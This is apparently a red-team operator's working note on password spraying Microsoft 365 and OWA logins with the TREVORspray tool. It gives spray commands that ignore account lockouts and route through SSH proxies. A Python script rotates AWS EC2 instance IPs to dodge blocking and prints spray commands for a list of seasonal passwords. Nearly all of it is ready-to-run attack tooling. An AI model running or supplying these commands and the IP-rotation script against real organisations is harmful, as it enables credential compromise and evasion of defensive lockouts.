TrevorSpray

TrevorSpray

O365:

trevorspray --users 'USERS.txt' -p PASSWORD -i s.pem --delay 60 --lockout-delay 50 --random-useragent --jitter 30 -m msol --ignore-lockouts --ssh  USER@HOST USER@HOST 

OWA:

trevorspray -u ../azurehound/users.txt -p Summer22 -m owa --url https://autodiscover.DOMAIN.co.uk/autodiscover/autodiscover.xml

https://github.com/blacklanternsecurity/TREVORspray

Update IPs:

import boto3, os, time
import numpy as np

region='eu-west-2'
access_key_id='ID_KEY'
access_key='ACCESS_KEY'
client = boto3.client('ec2', region_name=region, aws_access_key_id=access_key_id, aws_secret_access_key=access_key)

def instances():
	started_instance_ids = []
	stopped_instance_ids = []
	instance_ips = []
	tag_name = 'TREVOR*'
	instances = client.describe_instances(Filters=[{'Name': 'tag:Name','Values': [tag_name]}])
	ids = instances['Reservations']
	for instances in ids:
		for instance in instances['Instances']:
			if instance['State']['Name'] == 'stopped':
				stopped_instance_ids.append(instance['InstanceId'])
			if instance['State']['Name'] == 'running':
				started_instance_ids.append(instance['InstanceId'])
				instance_ips.append(instance['PublicIpAddress'])
	return stopped_instance_ids, started_instance_ids, instance_ips

def stop(instance_id):
	stop = client.stop_instances(InstanceIds=[instance_id])
	return stop['StoppingInstances'][0]['CurrentState']['Name']

def start(instance_id):
	start = client.start_instances(InstanceIds=[instance_id])
	return start['StartingInstances'][0]['CurrentState']['Name']

def update_sec_group(old_ips, new_ips):
	client = boto3.client('ec2', region_name=region, aws_access_key_id=access_key_id, aws_secret_access_key=access_key)
	# Get sec group ID
	group_information = client.describe_security_groups(Filters=[{'Name': 'group-name','Values': ['launch-wizard-18']}])
	group_id = group_information['SecurityGroups'][0]['GroupId']
	FromPort = 22
	ToPort = 22
	IpProtocol = 'tcp'
	
	# remove old
	for IP in old_ips:
		try:
			client.revoke_security_group_ingress(GroupId=group_id,IpPermissions=[{'FromPort': FromPort,'IpProtocol':
				IpProtocol,'ToPort': ToPort, 'IpRanges':[{'CidrIp': f'{IP}/32'}]}], DryRun=False)
		except Exception as e:
			print(f'Error removing old rule: {e}')

	# add new 
	for IP in new_ips:
		try:
			client.authorize_security_group_ingress(GroupId=group_id,IpPermissions=[{'FromPort': FromPort,'IpProtocol':
				IpProtocol,'ToPort': ToPort, 'IpRanges':[{'CidrIp': f'{IP}/32'}]}], DryRun=False)
		except Exception as e:
			print(f'Error adding new rule: {e}')

def banner():
	os.system('cls' if os.name == 'nt' else 'clear')

	print("""
bbbbbbbb                                                                               dddddddd
b::::::b                                                                               d::::::d
b::::::b                                                                               d::::::d
b::::::b                                                                               d::::::d
 b:::::b                                                                               d:::::d
 b:::::bbbbbbbbb    rrrrr   rrrrrrrrr       eeeeeeeeeeee    aaaaaaaaaaaaa      ddddddddd:::::d
 b::::::::::::::bb  r::::rrr:::::::::r    ee::::::::::::ee  a::::::::::::a   dd::::::::::::::d
 b::::::::::::::::b r:::::::::::::::::r  e::::::eeeee:::::eeaaaaaaaaa:::::a d::::::::::::::::d
 b:::::bbbbb:::::::brr::::::rrrrr::::::re::::::e     e:::::e         a::::ad:::::::ddddd:::::d
 b:::::b    b::::::b r:::::r     r:::::re:::::::eeeee::::::e  aaaaaaa:::::ad::::::d    d:::::d
 b:::::b     b:::::b r:::::r     rrrrrrre:::::::::::::::::e aa::::::::::::ad:::::d     d:::::d
 b:::::b     b:::::b r:::::r            e::::::eeeeeeeeeee a::::aaaa::::::ad:::::d     d:::::d
 b:::::b     b:::::b r:::::r            e:::::::e         a::::a    a:::::ad:::::d     d:::::d
 b:::::bbbbbb::::::b r:::::r            e::::::::e        a::::a    a:::::ad::::::ddddd::::::dd
 b::::::::::::::::b  r:::::r             e::::::::eeeeeeeea:::::aaaa::::::a d:::::::::::::::::d
 b:::::::::::::::b   r:::::r              ee:::::::::::::e a::::::::::aa:::a d:::::::::ddd::::d
 bbbbbbbbbbbbbbbb    rrrrrrr                eeeeeeeeeeeeee  aaaaaaaaaa  aaaa  ddddddddd   ddddd

[*] Now go get that bread
 """)

if __name__ == '__main__':
	banner()
	stopped_instances, started_instances, old_ips = instances()
	print(f'[+] identified {len(stopped_instances)} stopped instances and {len(started_instances)} currently running')
	decide = input('do you want to restart?\n')
	if 'y' in decide.lower():
		print(f'[+] current IPs: {old_ips}')
		for InstanceId in started_instances:
			stopping = stop(InstanceId)
			while stopping == 'stopping':
				print(f'[+] stopping instance {InstanceId}, current state ')
				print(f'{stopping:}', end="\r")
				time.sleep(2)
				stopping = stop(InstanceId)
			if InstanceId not in stopped_instances:
				time.sleep(2)
				stopped_instances.append(InstanceId)
	for InstanceId in stopped_instances:
		starting = start(InstanceId)
		while starting == 'pending':
			print(f'[+] starting instance {InstanceId} current state:')
			print(f'{starting:}', end="\r")
			time.sleep(2)
			starting = start(InstanceId)
	stopped_instances, started_instances, new_ips = instances()
	print(f'[+] got the following IPs: {new_ips}')
	if new_ips:
		update_sec_group(old_ips, new_ips)
		print(f'[+] Added new ips to sec group')
		passwords = ['Summer22', 'Summer2022', 'Winter2022', 'Winter22', 'Spring2022', 'Spring22']
		x = 0
		i = 1
		new_list = []
		new_hosts = []
		for instance in new_ips:
				print(f'new ip len: {len(new_ips)}')
				print(f'new list len: {len(new_list)}')
				new_list.append(f'ubuntu@{instance}')
		x = 0
		for list in np.array_split(new_list, len(passwords)):
			print(f"trevorspray --users 'passenum.txt' -p '{passwords[x]}' -i s.pem --delay 60 --lockout-delay 50 --random-useragent --jitter 30 -m msol --ignore-lockouts --ssh  {' '.join(new_list)}\\n\"")
			x = x + 1
		print(f'Goodluck...')
		exit()
		i = i + 1
	else:
		print(f'Error, no new ips generated...')